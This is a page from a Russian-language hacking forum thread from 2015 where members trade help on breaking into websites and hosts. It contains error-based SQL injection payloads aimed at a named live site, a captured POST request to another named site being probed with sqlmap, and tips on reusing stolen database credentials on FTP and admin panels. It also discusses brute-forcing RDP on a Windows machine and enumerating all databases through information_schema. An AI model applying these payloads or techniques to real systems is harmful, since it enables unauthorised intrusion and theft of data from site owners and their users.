Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 38]
     
    #621 cheebeez, 1 Oct 2015
    Last edited: 25 Apr 2016
  2. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    ХЕЛП
    если
    Code:
    'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))='
    то
    You can't specify target table 'ТАБЛИЦА' for update in FROM clause
     
    #622 ButilkaSoka, 1 Oct 2015
    Last edited: 1 Oct 2015
  3. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 39]
     
    #623 cheebeez, 1 Oct 2015
    Last edited: 25 Apr 2016
  4. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Опечатался,
    You can't specify target table 'ТАБЛИЦА' for update in FROM clause
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это настройки для подключения к бд
     
    _________________________
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)
     
    _________________________
    #626 Konqi, 2 Oct 2015
    Last edited: 2 Oct 2015
    SaNDER likes this.
  7. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 52]
     
    #627 cheebeez, 3 Oct 2015
    Last edited: 25 Apr 2016
    SaNDER likes this.
  8. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все:
    сборник - пользовательский
    IPC$ (Удаленный IPC) - pipe по умолчанию
    D$ (Стандартный общий ресурс) - диск по умолчанию
    ADMIN$ (Удаленный Admin) - диск по умолчанию
    C$ (Стандартный общий ресурс) - диск по умолчанию
    Подключается лишь к сборнику. Остальное - не получается null login не работает.
    Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios
     
    #628 Sharingan, 4 Oct 2015
    Last edited: 4 Oct 2015
  9. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?

    UPD. Закрыто, ниже frank ответил.
     
    #629 AlexG, 5 Oct 2015
    Last edited: 5 Oct 2015
  10. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    http://raz0r.name/obzory/group_concat/
     
    AlexG likes this.
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    https://forum.antichat.ru/threads/425320/
     
    _________________________
    AlexG likes this.
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Полный список всех методов обхода сейчас приведен здесь: https://rdot.org/forum/showthread.php?t=2860 (5: group_concat, benchmark, @, insert, replace).

    Наиболее удобный в стандартной ситуации способ - 3.
     
    frank and AlexG like this.
  13. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    http://mariin.ru/index.php?q=12'
    www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/*

    Нужно узнать префикс таблиц, чтоб вытащить админов. cms дырявая, но 4 версия mysql всему мешает. Рес оч нужный, прошу помоч)
    PROCEDURE ANALYSE() заиспользовать не получилось, мб не правильно делаю
     
  14. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    Там не Oracle, а Microsoft Access.
     
  15. Valer4ik

    Valer4ik New Member

    Joined:
    25 Jul 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
    справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
    если запрос повторить, вылазит ошибка.
    <p><b>MySql error:</b> Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'
    <br><b>query:</b> INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')




    POST /apatity/business-internet/ HTTP/1.1
    Host: karelia.pro
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://karelia.pro/apatity/business-internet/
    Cookie: __utma=86736642.1434525950.1444154760.1444207012.1444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 140
    name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&street=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2%F1%EA%E0%FF&phone=3336324&info=&send=%A0


    не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
    false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
    Можно это как то раскрутить?
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
    и по реализации. какие отличия, минусы, плюсы. Спасибо.
     
  17. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    _________________________
    BabaDook likes this.
  18. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
    Code:
    extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
    для работы с другими базами (как перебрать имена всех баз)?
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    select table_schema from information_schema.tables limit 1,1
     
    AlexG likes this.
  20. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    select schema_name from information_schema.schemata limit 0,1
     
    _________________________
    AlexG likes this.